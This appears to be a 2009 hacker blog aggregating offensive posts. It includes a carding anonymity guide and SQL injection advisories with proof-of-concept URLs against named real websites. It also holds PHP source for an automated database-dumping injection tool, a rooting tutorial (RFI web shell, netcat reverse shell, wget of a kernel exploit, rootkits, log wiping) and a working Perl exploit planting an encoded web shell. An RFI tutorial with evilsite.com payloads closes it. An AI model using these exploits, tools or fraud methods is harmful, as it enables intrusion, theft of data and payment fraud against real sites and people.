AOL1 pass AOL1. than open AOL 9.1 as I said only after you have downloaded and instaled AOL 10 and than u will see first time NON BLACK listed AOL IP :D pure and simple...after you have done and you have disconected and reconected and didnt gave you a non black listed IP, try few more times 1 2, if not than delete user aol1 and make aol2 and so on :) NEW ip non black listed...

To test if your ip is in black list the easyest way go to this link

https://post.craigslist.org/chi/S/cto/

If you get this "You need to have a craigslist account to post to cars & trucks - by owner on chicago craigslist. " than be sure ur ip is 100% in BLACK LIST.

If you got a page with GREEN and you can add your description on your "car" than your ip is not blacklisted and can be used to a very fucked up site that have the biggest security in the world and YOU can card that site :D I made testes so i am sure about what I am saying :P

=================================

2. Local IP > VPN

www.findnot.com < I used a Japan credit card and i bought it for a year and worked...still working and I am still connected to this
Findnot have many servers all over the world and there are fast servers

3. Local IP > TOR

This tool is more than great if you dont trust me do this test and you will see what TOR can provide :)
Also many of you know that TOR connect every time from different 3 IP from DIfferent country's

So far so good...BUT why if you can Change your First IP and Last IP so every time you will Re-connect just from 1 ip that is in the middle and not from 3.

FOR low internet connections.

So for testing to see HOW private is TOR do this..

first open again from your Local IP [url="http://www.showmyip.com/?version=full"]http://www.showmyip.com/?version=full[/url] > AND down at:

Computer/Device Properties (as of August 21, 2008 07:00 UTC) you will see your computer DATA, than open TOR put as socks 127.0.0.1 TOR port and than OPEN again this website...YOU will see the data from there was changed...SO when you are doing CARDING...even if you are not connected from your IP address and u are using all kind of softwares to change your IP..this DATA will remaine 100% sure in their database if they asking for this data...BUT with TOR...no more information about your computer: Operating System Platform, Screen Width: Screen Height: etc.

Now to easy your things and also using TOR on all the softwares you are open use

Proxifier, So first open TOR connect to TOR network than Open proxifier add in proxifier 127.0.0.1:TORport and than. Open Firefox or Iexplore BUT dont click on socks let them choice ip from local..and you will see IP Proxifier take ip from TOR

=============================

Now for those who are fucked up on their mind and are very well scared...You can use this:

Local IP > VPN > Proxifier + TOR + Remote desktop connection or socks or anything u guys want. AOL or CS wont work with Proxifier + tor

or

Local IP > VPN > AOL > TOR and u can change tor's last ip every time u want but modify the config

====

Usualy i use just VPN but if I want to do something or to enter to a private network than I use Local IP > VPN > Proxifier + TOR + something else :D

Hope I have helped you a little bit with this tutorial.

p.s: dont use socks or proxy... from LOCAL IP > socks ...this is shit. use LOCAL IP > VPN or TOR > socks :D much more safe than just with socks on local ip even if ur connection is slow try to find a good VPN and than to a socks or proxy

Have Fun on carding/hacking/cracking/ or whatever u guys are doing and want to hide ur ip :D[u][/u]

Happy Eid-Ul Fitr 1430

2009-09-19T20:14:00.000-07:00

Words by words here might hurt you once even more. In case, We need to apologize to you on it.

Translation (lol) :

SAYA MATTHEWS MENGUCAPKAN

SELAMAT HARI RAYA IDUL FITRI 1430 H

MOHON MAAF LAHIR BATIN

IMS SiteManager Blind SQL Injection Vuln

2009-09-19T20:12:00.000-07:00

[o]------------------------------------------------------------------------------------[x]
| Blind SQL Injection Vulnerability
|
[o]------------------------------------------------------------------------------------[o]
| Software : IMS SiteManager
|
| Vendor : www.sitemanager.ims.net
|
| Date : 13 sept 2009
|
| Author : zxvf
|
| Contact : paddy[at]antisecurity[dot]org
|
[o]------------------------------------------------------------------------------------[o]

[?] Google Dork

"Powered by IMS SiteManager"

[?] Exploit

http://[site]/index.php?storecategory_id=

[?] Proof of Concept

https://www.rainfordane.com/order/index.php?storecategory_id=247
https://www.downtownmadison.org/store/index.php?storecategory_id=223

[o]------------------------------------------------------------------------------------[x]
| Greetz
|
[o]------------------------------------------------------------------------------------[o]
| AntiSecurity Crew
|
| Mainhack Crew
|
| Nob0dy Crew
|
| c0li, OoN_Boy, NoGe, paman, pizzyroot, noname, angela, eminem, xx_user,
|
| Special for Dipsy
|
| Armageddon Team, and all indonesian hacker!
|
| BeHave oR BeGone !!!
|
[o]------------------------------------------------------------------------------------[o]

ExpressLink™ SEO Blind SQL Injection Vuln

2009-09-19T20:08:00.000-07:00

<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>
* Details *
<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>

<>>><<>>> type :: ( menu_list.php?cid= ) Blind Sql Injection Vulnerability

<>>><<>>> author :: ^s0n_g0ku^

<>>><<>>> Contact :: dh_4n[at]ymail[dot]com

<>>><<>>> Site :: http://xcode.or.id/

<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>
* Script information *
<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>

<>>><<>>> script :: ExpressLink™ SEO

<>>><<>>> Vendor :: http://www.wevioexpress.com/

<>>><<>>> dork :: kreasikan Pikiranmu

<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>
* Exploit *
<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>

<>>><<>>> Exploit ::

http://www.site.com/menu_list.php?cid=381

<>>><<>>> Examp ::

http://www.poloagawa.com/menu_list.php?cid=381+and+1=1 <<< Thrue
http://www.poloagawa.com/menu_list.php?cid=381+and+1=2 <<< false

http://www.empireallergy.com/menu_list.php?cid=1+and+1=1 <<< Thrue
http://www.empireallergy.com/menu_list.php?cid=1+and+1=2 <<< false

<>>><<>>> Admin Login Page ::

http://site.com/admin/

Enjoy That

BSR Webweaver Version 1.33 /Scripts access restriction bypass

2009-09-17T05:35:00.000-07:00

[*] Date: 15/09/09

[*] http://www.brswebweaver.com/downloads.html

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Description : In ISAPI/CGI path is [%installdirectory%/scripts] and through HTTP the alias is [http://[host]/scripts] ,The access security check is that if the attacker tries to access /scripts a 404 Error response occurs ! Now to bypass and check the directory listing [That is if Directory Browsing is allowed in the server Configuration !] just copy and paste the exploit url !.
This is the reason this exploit is not called a Directory Listing Exploit !

[*] Exploitation :

[+] http://[host]/scripts/%bg%ae%bg%ae/.exe

How to Use John the Ripper

2009-09-17T05:04:00.000-07:00

In this config we going to use John the Ripper’s password cracker to enhance the security of your server by choosing a proper password for your system. This config assumes that you have already installed John the Ripper’s password cracker. If you haven’t installed it then please go to install Password cracker - John the Ripper now.

Create test user

For testing purposes you should create a testing user “johnripper” with password “password”.

adduser johnripper

Image:johnripper01.jpg

Crack password

John the Ripper’s password cracker needs to access a shadow file in order to be able crack a password. You need to run “john” as superuser “root”. Be sure that John Binary is in your path, or you are in directory where john Binary resides. Try and see how long it will take to crack your super secure password of: “password”

./john -users:johnripper /etc/shadow

Image:johnripper02.jpg

To guess a password in 0 seconds is excellent time. Try making it more difficult and change the password for user “johnripper” to “password1″ and attempt to crack the password again:

Image:johnripper03.jpg

What if you changed the password to “password10″. How long will it take to crack the password now? Who knows, I gave up after 23 hours. Apparently my linuxbox is not as powerful as I thought, if you get a result please let me know.

Image:johnripper04.jpg

Linux Kernel 2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)

2009-09-17T05:01:00.001-07:00

/* second verse, same as the first
CVE-2009-2698 udp_sendmsg(), x86/x64
Cheers to Julien/Tavis for the bug, p0c73n1 for just throwing code at
NULL and finding it executed
This exploit is a bit more nuanced and thoughtful ;)
use ./therebel.sh for everything

At this moment, when each of us must fit an arrow to his bow and
enter the lists anew, to reconquer, within history and in spite of it,
that which he owns already, the thin yield of his fields, the brief
love of the earth, at this moment when at last a man is born, it is
time to forsake our age and its adolescent furies. The bow bends;
the wood complains. At the moment of supreme tension, there will
leap into flight an unswerving arrow, a shaft that is inflexible and
free. -Camus
*/

main: http://grsecurity.net/~spender/therebel.tgz
back: http://milw0rm.com/sploits/2009-therebel.tgz

IndexScript 3.0 SQL Injection Vuln

2009-09-14T02:45:00.000-07:00

[o] IndexScript 3.0 SQL Injection Vulnerability
Software : IndexScript version 3.0
Vendor : http://www.indexscript.com/
Download : http://www.indexscript.com/download.php
Author : NoGe
Home : http://antisecurity.org

[o] Vulnerable file
more.php

[o] Exploit
http://localhost/[path]/more.php?cat_id=[SQL]

[o] Proof of Concept
http://texxsmith.com/directory/more.php?cat_id=-3+union+select+1,2,3,4,5,version(),database(),user(),9--
http://www.internetkatalogen.net/more.php?cat_id=-77+union+select+1,2,3,4,5,version(),database(),user(),9--

[o] Dork
"powered by IndexScript"

Sourcode sqltools.php

2009-09-12T19:16:00.000-07:00

code sql tools

<?
set_time_limit(0);
error_reporting(0);
$fungsi=strip_tags($_POST['fungsi']);
$url=strip_tags($_POST['url']);
$db=strip_tags($_POST['db']);
$table=strip_tags($_POST['table']);
$column=strip_tags($_POST['column']);
$start=strip_tags($_POST['start']);
$stop=strip_tags($_POST['stop']);
  $target=strip_tags($_POST['target']);
  ?>
  <title>.: SQL INJECTION TOOL BY ECEK2 & OON_BOY :.</title>
  <head>
  </head>
  <script>
  function show(id){
  document.getElementById(id).style.display="block";
  }
  function hide(id){
  document.getElementById(id).style.display="none";
  }
  function db(){show("db");hide("table");hide("column");hide("dump");hide("findcol");}
  function table(){hide("db");show("table");hide("column");hide("dump");hide("findcol");}
  function column(){hide("db");hide("table");show("column");hide("dump");hide("findcol");}
  function dump(){hide("db");hide("table");hide("column");show("dump");hide("findcol");}
  function findcol(){hide("db");hide("table");hide("column");hide("dump");show("findcol");}
  function help(){alert("This tool is for helping us playing with sql injection for php mysql site \n Please contact us when you find bug in this tool \n oon@oonboy.info");}
  </script>
  <style>
  #db,#table,#column,#dump,#findcol {display:none;}
  </style>
<a href="javascript:findcol();">FindCol</a> |
  <a href="javascript:db();">Database</a> |
  <a href="javascript:table();">Table</a> |
  <a href="javascript:column();">Column</a> |
  <a href="javascript:dump();">Dump</a> |
  <a href="javascript:help();">Help</a> |
  <b>Created by <a href=http://ecek2.dibatam.com>ecek2</a> & <a 
  href=http://oon.batamhacker.or.id>OoN_Boy</a></b>
  <p>

<div id=db>
  <form method=post>
  <input type=hidden name=fungsi value=db>
  <table><tr><td>url<td> : <td><input name=url size=100 value="<?=$url;?>">
  <tr><td><td><td><input type=submit value="Show Databases"></table>
  </form>
  </div>
<div id=table>
  ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9
  <form method=post>
  <input type=hidden name=fungsi value=table>
  <table><tr><td>url<td> : <td><input name=url size=100 value="<?=$url;?>"><br>
  <tr><td>DB<td> : <td><input name=db value="<?=$db;?>"><br>

  <tr><td><td><td><input type=submit value="Show Table"></table>
  </form>
  </div>
<div id=column>
  ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9
  <form method=post>
  <input type=hidden name=fungsi value=column>
  <table><tr><td>url<td> : <td><input name=url size=100 value="<?=$url;?>">
  <tr><td>DB<td> : <td><input name=db value="<?=$db;?>">
  <tr><td>Table<td> : <td><input name=table value="<?=$table;?>">
  <tr><td><td><td><input type=submit value="Show Column"></table>
  </form>
  </div>
<div id=dump>
  ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9
  <form method=post>
  <input type=hidden name=fungsi value=dump>
  <table><tr><td>url<td> : <td><input name=url size=100 value="<?=$url;?>">
  <tr><td>DB<td> : <td><input name=db value="<?=$db;?>">
  <tr><td>Table<td> : <td><input name=table value="<?=$table;?>">
  <tr><td>Column<td> : <td><input name=column value="<?=$column;?>"> ex : email,passwd,card_num
  <tr><td>Start<td> : <td><input name=start value="<?=$start;?>"> **start from field number**
  <tr><td>Stop<td> : <td><input name=stop value="<?=$stop;?>"> **stop field number**
  <tr><td><td><td><input type=submit value="Dump"></table>
  </form>
  </div>
<div id=findcol>
  ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9
  <form method=post>
  Target <input name=target size=100 value="<?=$target;?>"><input type=submit value=test>
  </form>
  </div>
<?
/* GET DATABASE NAME */
  if(isset($url) && $fungsi=="db"){
  $countdb="concat(0x6b30706c30,count(schema_name),0x6b30706c30)";
  $showdb="concat(0x6b30706c30,schema_name,0x6b30706c30)";
  $showdb2="+from+information_schema.schemata";
  $end="--";
  //print "$url <br>";
  $url_1=str_replace("k0pl0",$countdb,$url);
  $url_2=$url_1.$showdb2.$end;
  $url_3=str_replace("k0pl0",$showdb,$url);
  $data=file_get_contents($url_2);
  $jumlah=antara($data,"k0pl0","k0pl0");
  echo "$jumlah database<br>";
  for($i=0;$i<$jumlah;$i++){
  flush();
  $nomor=($i+1);
  $urlx=$url_3.$showdb2."+limit+$i,1".$end;
  $datax=file_get_contents($urlx);
  $namadatabase=antara($datax,"k0pl0","k0pl0");
  echo "$nomor : $namadatabase <br>";
  flush();
  }
  }

/* GET TABLE NAME */
  if(isset($url) && $fungsi == "table"){
  $query="concat(0x6b30706c30,count(table_name),0x6b30706c30)";
  $next="+from+information_schema.tables";
  $query2="concat(0x6b30706c30,table_name,0x6b30706c30)";
  $end="--";
if(isset($db) && $db !==""){
  $next=$next."+where+table_schema=0x".bin2hex($db);
  }

$url_1=str_replace("k0pl0",$query,$url);
  $url_2=$url_1.$next.$end;
  $url_3=str_replace("k0pl0",$query2,$url);
  //echo "inject : $url_2";
  $data=file_get_contents($url_2);
  //echo $data;
  $jumlah=antara($data,"k0pl0","k0pl0");
  echo "<br>$jumlah tables<br>";
  for($i=0;$i<$jumlah;$i++){
  flush();
  $nomor=($i+1);
  $urlx=$url_3.$next."+limit+$i,1".$end;
  $datax=file_get_contents($urlx);
  $namatable=antara($datax,"k0pl0","k0pl0");
  echo "$nomor : $namatable <br>";
  flush();
  }
  }
// GET COLUMN NAME LIST
  if(isset($url) && $url3 !== "" && isset($table) && $table !== "" && $fungsi == "column"){
  $query="concat(0x6b30706c30,count(column_name),0x6b30706c30)";
  $next="+from+information_schema.columns+where+table_name=0x".bin2hex($table);
  $query2="concat(0x6b30706c30,column_name,0x6b30706c30)";
  $end="--";
if(isset($db) && $db !==""){
  $next=$next."+and+table_schema=0x".bin2hex($db);
  }
$url_1=str_replace("k0pl0",$query,$url);
  $url_2=$url_1.$next.$end;
  $url_3=str_replace("k0pl0",$query2,$url);
  //echo "inject : $url_2";
  $data=file_get_contents($url_2);
  //echo $data;
  $jumlah=antara($data,"k0pl0","k0pl0");
  echo "<br>$jumlah Columns<br>";
  for($i=0;$i<$jumlah;$i++){
  flush();
  $nomor=($i+1);
  $urlx=$url_3.$next."+limit+$i,1".$end;
  //echo $urlx;
  $datax=file_get_contents($urlx);
  $namatable=antara($datax,"k0pl0","k0pl0");
  echo "$nomor : $namatable <br>";
  flush();
  }
  }

// DUMB DATA
  if($fungsi=="dump" && isset($url) && $url !== "" && isset($table) && $table !== "" && isset($column) && $column !=="" ){
  $query="concat(0x6b30706c30,count(*),0x6b30706c30)";
  $next="+from+$table";
  $query2="concat(0x6b30706c30,concat_ws(0x203a20,".$column."),0x6b30706c30)";
  $end="--";
if(isset($db) && $db !==""){
  $next="+from+$db.$table";
  }
$url_1=str_replace("k0pl0",$query,$url);
  $url_2=$url_1.$next.$end;
  $url_3=str_replace("k0pl0",$query2,$url);
  //echo "inject : $url_2";
  $data=file_get_contents($url_2);
  //echo $data;
  $jumlah=antara($data,"k0pl0","k0pl0");
  echo "<br>$jumlah data<br>";
  for($i=$start;$i<=$stop;$i++){
  flush();
  $nomor=$i;
  $urlx=$url_3.$next."+limit+$i,1".$end;
  //echo $urlx;
  $datax=file_get_contents($urlx);
  $namatable=antara($datax,"k0pl0","k0pl0");
  echo "$nomor : $namatable <br>";
  flush();
  }
  }
// GET MAGIC NUMBER
  if(isset($target) && $taget !== ""){
  echo "trying... 1 ";
  $targetx=$target."-1+union+select+0x6b30706c30";
  $targety=$target."-1+union+select+1";
  $injek="";
  $y="";
  $end="--";
  for($i=1;$i<100;$i++){
  flush();
  $y .= ",".($i+1);
  $oon=($i+1)."oon";
  $hexx=bin2hex($oon);
  $injek.=",0x6b30706c30".$hexx;
  $link=$targetx.$injek;
  $akhir = $link.$end;
  //echo $akhir;
  echo ($i+1)." ";
  $data=file_get_contents($akhir);
  if(eregi("k0pl0",$data)){
  $magicnumber=antara($data,"k0pl0","oon");
  $mbuh=",".$magicnumber.",";
  $zzz=str_replace($mbuh,",k0pl0,",$targety.$y);
  $linkinjek=$targety.$y.$end;
  echo "<br>VULNER : $zzz<br>Magic number= $magicnumber<br><a href=$linkinjek target=\"_blank\">$linkinjek</a><p><b>info</b><br>";
  $ambilinfo=str_replace("k0pl0","concat(0x6b30706c30,concat_ws(0x3c62723e,concat(0x64617461626173652076657273696f6e203a20,version()),concat(0x64617461626173652075736572203a20,user()),concat(0x6461746162617365206e616d65203a20,database())),0x6b30706c30)",$zzz).$end;
  $datainfo=file_get_contents($ambilinfo);
  $info=antara($datainfo,"k0pl0","k0pl0");
  echo $info;
  break;
  }
  if($i=="99"){echo "<br><font color=red><b>Maybe this site is not Vulner, or you can try to inject it manually :)<b></font>";}
  flush();
  }
}

 function antara($string, $start, $end){
  $string = " ".$string;
  $ini = strpos($string,$start);
  if ($ini == 0) return "";
  $ini += strlen($start);
  $len = strpos($string,$end,$ini) - $ini;
  return substr($string,$ini,$len);

Local Root via NetCat

2009-09-12T18:12:00.000-07:00

take from BABY CORP

You will need:
Quote:
- Vulnerable Site in R.F.I.
- Shell for R.F.I. (e.g. c99, r57 or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)

This aim tutorial is to give a very general picture in process of Rooting in Linux Server with Safe Mod: OFF.Suppose that we have found a site with RFI vulnerability:

Code:

http://www.hackedsite.com/folder/index.html?page=

e can run shell exploiting Remote File Inclusion, as follows:

Code:

http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?

where evilscript.txt is our web shell that we have already uploaded to our site. (www.mysite.com in the folder: shells)

After we enter in shell, first of all we will see the version of the kernel at the top of the page or by typing: uname – a in Command line.

To continue we must connect with backconnection to the box. This can done with two ways if we have the suitable shell.

We can use the Back-Connect module of r57/c99 shell or to upload a backconnector in a writable folder

In most of the shells there is a backconnection feature without to upload the Connect Back Shell (or another one shell in perl/c). We will analyze the first way which is inside the shell (in our example the shell is r57).

Initially we open NetCat and give to listen in a specific port (this port must be correctly opened/forwarded in NAT/Firewall if we have a router) with the following way:

We will type: 11457 in the port input (This is the default port for the last versions of r57 shell). We can use and other port.

We press in Windows Start -> Run -> and we type: cmd

After we will go to the NetCat directory:

Quote:

cd C:\Program Files\Netcat
And we type the following command:
Quote:
nc -n -l -v -p 11456
NetCat respond: listening on [any] 11456 …

In the central page of r57 shell we find under the following menu::: Net:: and back-connect. In the IP Form we will type our IP (www.cmyip.com to see our ip if we have dynamic)

In the Port form we will put the port that we opened and NetCat listens.

If we press connect the shell will respond:

Now script try connect to port 11456 …

If our settings are correct NetCat will give us a shell to the server

Now we wil continue to the Rooting proccess.

We must find a writable folder in order to download and compile the Local Root Exploit that will give us root priviledges in the box. Depending on the version of the Linux kernel there are different exploits. Some times the exploits fail to run because some boxes are patched or we don’t have the correct permissions.List of the exploits/kernel:

Quote:
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.

Some sites that we can find Local Root Exploits:

milw0rm (Try Search: “linux kernel”)

Other sites: www.packetstormsecurity.org | www.milw0rm.com or try Googlin’ you can find ‘em all ;-)

We can find writable folders/files by typing:
Code:

find / -perm -2 -ls

We can use the /tmp folder which is a standard writable folder

We type:
Code:

cd /tmp

To download the local root exploit we can use a download command for linux like wget.

For example:
Quote:
wget http://www.yoursite.com/localroot/h00lyshit.c
where http://www.yoursite.com/localroot/h00lyshit.c is the url of h00lyshit.

After the download we must compile the exploit (Read the instruction of the exploit before the compile)

For the h00lyshit we must type:
Code:

gcc h00lyshit.c -o h00lyshit

Now we have created the executable file: h00lyshit.

The command to run this exploit is:
Code:

./h00lyshit

We need a very big file on the disk in order to run successfully and to get root.

We must create a big file in /tmp or into another writable folder.

The command is:
Code:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename.

We must wait 2-3 minutes for the file creation

If this command fails we can try:
Code:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can procced to the last step. We can run the exploit by typing:
Code:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(If we are in a different writable folder and the largefile is created in /tmp)

If there are not running errors (maybe the kernel is patched or is something wrong with exploit run or large file) we will get root

To check if we got root:

id or

whoami

If it says root we got root!

Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g. SSHDoor) and to take ssh/telnet shell access to the server.

We must erase all logs in order to be safe with a log cleaner. A good cleaner for this job is the MIG Log Cleaner.

Agoko CMS <= 0.4 remote commands execution exploit

2009-09-12T06:09:00.000-07:00

#!/usr/bin/perl

print q~
--------------------------------------------------
Agoko CMS <= 0.4 remote commands execution exploit
by staker
mail: staker[at]hotmail[dot]it
--------------------------------------------------

[*] Usage -> perl [xpl.pl] [host] [path]
[*] Example -> perl agk.pl localhost /Agoko

~;

#>-----------<#
#>- Working -<#
#>-----------<#########################################
# staker[death]:~/Desktop$ perl a.pl 127.0.0.1 /agoko #
# #
# -------------------------------------------------- #
# Agoko CMS <= 0.4 remote commands execution exploit #
# by staker #
# mail: staker[at]hotmail[dot]it #
# -------------------------------------------------- #
# #
# [*] Usage -> perl [xpl.pl] [host] [path] #
# [*] Example -> perl agk.pl localhost /Agoko #
# #
# shell already exists. #
# #
# Agoko[shell]:~$ uname -n -r #
# #
# death 2.6.27-7-generic #
#######################################################

use IO::Socket;
use LWP::Simple;

my $host = shift;
my $path = shift || exit(0);

check_shell($host,$path);

sub check_shell() {
my $host = $_[0];
my $path = $_[1] || die $!;

my $packet = "GET /$path/content/shell_vup.php HTTP/1.1\r\n".
"Host: $host\r\n".
"Cookie: bany=love_me\r\n".
"User-Agent: Lynx (textmode)\r\n".
"Connection: close\r\n\r\n";

if (give_kt($host,$packet) =~ /bany wtf/i) {
print "[*] shell already exists.\n";
load_cmd($host,$path);
}
else {
print "[*] exploiting..\n";
inject_shell($host,$path);
}
}

sub inject_shell() {
my ($host,$path) = @_;

my $shell = "\x3C\x3F\x70\x68\x70\x20\x20\x20\x20\x20\x20\x65\x72\x72".
"\x6F\x72\x5F\x72\x65\x70\x6F\x72\x74\x69\x6E\x67\x28\x45".
"\x5F\x41\x4C\x4C\x29\x3B\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x69\x66\x20\x28\x69\x73\x73\x65\x74\x28".
"\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64\x27\x5D\x29\x29".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x61\x73\x73".
"\x74\x68\x72\x75\x28\x73\x74\x72\x69\x70\x73\x6C\x61\x73".
"\x68\x65\x73\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64".
"\x27\x5D\x29\x29\x3B\x20\x20\x20\x20\x20\x20\x65\x6C\x73".
"\x65\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x69\x65\x28".
"\x22\x62\x61\x6E\x79\x20\x77\x74\x66\x22\x29\x3B\x20\x20".
"\x20\x20\x20\x20\x3F\x3E\x20";

my $data = "filename=shell_vup.php\x00&text=$shell&Submit=Speichern";

my $packet = "POST /$path/admintools/editpage-2.php HTTP/1.1\r\n".
"Host: $host\r\n".
"User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n".
"Cookie: bany=love_me\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: ".length($data)."\r\n".
"Connection: close\r\n\r\n".
$data;

if (give_kt($host,$packet) =~ /erfolgreich eingetragen/i)
{
load_cmd($host,$path)
}
else
{
die "[*] Exploit failed.\n";
}

}

sub load_cmd() {
my $host = $_[0];
my $path = $_[1];

while (1)
{
print "\nAgoko[shell]:~\$ ";
chomp (my $cmd = );

exit(0) if $cmd =~ /^(exit|quit|out)+$/i;

getprint("http://$host/$path/content/shell_vup.php?cmd=$cmd");
}
}

sub give_kt() {
my $input = $_[0];
my $heads = $_[1] || die $!;

my $result;
my $socket = IO::Socket::INET->new(
PeerAddr => $input,
PeerPort => 80,
Proto => 'tcp'
) || die $!;

$socket->send($heads);

while (<$socket>) { $result .= $_; }

return $result;
}

Finding vulnerabilities in PHP scripts FULL ( with examples )

2009-09-12T05:33:00.000-07:00

Name : Finding vulnerabilities in PHP scripts FULL ( with examples )
Author : SirGod
Email : sirgod08[at]gmail[dot]com
Contents :

1) About
2) Some stuff
3) Remote File Inclusion
3.0 - Basic example
3.1 - Simple example
3.2 - How to fix
4) Local File Inclusion
4.0 - Basic example
4.1 - Simple example
4.2 - How to fix
5) Local File Disclosure/Download
5.0 - Basic example
5.1 - Simple example
5.2 - How to fix
6) SQL Injection
6.0 - Basic example
6.1 - Simple example
6.2 - SQL Login Bypass
6.3 - How to fix
7) Insecure Cookie Handling
7.0 - Basic example
7.1 - Simple example
7.2 - How to fix
8) Remote Command Execution
8.0 - Basic example
8.1 - Simple example
8.2 - Advanced example
8.3 - How to fix
9) Remote Code Execution
9.0 - Basic example
9.1 - Simple example
9.2 - How to fix
10) Cross-Site Scripting
10.0 - Basic example
10.1 - Another example
10.2 - Simple example
10.3 - How to fix
11) Authentication Bypass
11.0 - Basic example
11.1 - Via login variable
11.2 - Unprotected Admin CP
11.3 - How to fix
12) Insecure Permissions
12.0 - Basic example
12.1 - Read the users/passwords
12.2 - Download backups
12.3 - INC files
12.4 - How to fix
13) Cross Site Request Forgery
13.0 - Basic example
13.1 - Simple example
13.2 - How to fix
14) Shoutz

1) In this tutorial I will show you how you can find vulnerabilities in php scripts.I will not explain
how to exploit the vulnerabilities,it is pretty easy and you can find info around the web.All the
examples without the basic example of each category was founded in different scripts.

2) First,install Apache,PHP and MySQL on your computer.Addionally you can install phpMyAdmin.
You can install WAMP server for example,it has all in one..Most vulnerabilities need special conditions
to work.So you will need to set up properly the PHP configuration file (php.ini) .I will show you what
configuration I use and why :

safe_mode = off ( a lot of shit cannot be done with this on )
disabled_functions = N/A ( no one,we want all )
register_globals = on ( we can set variables by request )
allow_url_include = on ( for lfi/rfi )
allow_url_fopen = on ( for lfi/rfi )
magic_quotes_gpc = off ( this will escape ' " \ and NUL's with a backslash and we don't want that )
short_tag_open = on ( some scripts are using short tags,better on )
file_uploads = on ( we want to upload )
display_errors = on ( we want to see the script errors,maybe some undeclared variables? )

How to proceed : First,create a database to be used by different scripts.Install the script on
localhost and start the audit over the source code.If you found something open the web browser and
test it,maybe you are wrong.

3) Remote File Inclusion

- Tips : You can use the NULLBYTE and ? trick.
You can use HTTPS and FTP to bypass filters ( http filtered )

In PHP is 4 functions through you can include code.

require - require() is identical to include() except upon failure it will produce a fatal E_ERROR level error.
require_once - is identical to require() except PHP will check if the file has already been included, and if so, not include (require) it again.
include - includes and evaluates the specified file.
include_once - includes and evaluates the specified file during the execution of the script.

3.0 - Basic example

- Tips : some scripts don't accept "http" in variables,"http" word is forbbiden so
you can use "https" or "ftp".

- Code snippet from test.php

-----------------------------------------------
$pagina=$_GET['pagina'];
include $pagina;
?>
-----------------------------------------------

- If we access the page we got some errors and some warnings( not pasted ) :

Notice: Undefined index: pagina in C:\wamp\www\test.php on line 2

- We can see here that "pagina" variable is undeclared.We can set any value to "pagina" variable.Example :

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt

Now I will show why some people use ? and %00 after the link to the evil script.

# The "%00"

- Code snippet from test.php

-----------------------------------------------
$pagina=$_GET['pagina'];
include $pagina.'.php';
?>
-----------------------------------------------

- So if we will request

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt

Will not work because the script will try to include http://evilsite.com/evilscript.txt.php

So we will add a NULLBYTE ( %00 ) and all the shit after nullbyte will not be taken in
consideration.Example :

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt%00

The script will successfully include our evilscript and will throw to junk the things
after the nullbyte.

# The "?"

- Code snippet from test.php

-----------------------------------------------
$pagina=$_GET['pagina'];
include $pagina.'logged=1';
?>
-----------------------------------------------

And the logged=1 will become like a variable.But better use nullbyte.Example :

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt?logged=1

The evilscript will be included succesfully.

3.1 - Simple example

Now an example from a script.

- Code snippet from index.php

----------------------------------------------------
if (isset($_REQUEST["main_content"])){
$main_content = $_REQUEST["main_content"];
} else if (isset($_SESSION["main_content"])){
$main_content = $_SESSION["main_content"];
}
.......................etc..................
ob_start();
require_once($main_content);
----------------------------------------------------

We can see that "main_content" variable is requested by $_REQUEST method.The attacker can
set any value that he want. Below the "main_content" variable is include.So if we make the
following request :

http://127.0.0.1/index.php?main_content=http://evilsite.com/evilscript.txt

Our evil script will be successfully included.

3.2 - How to fix

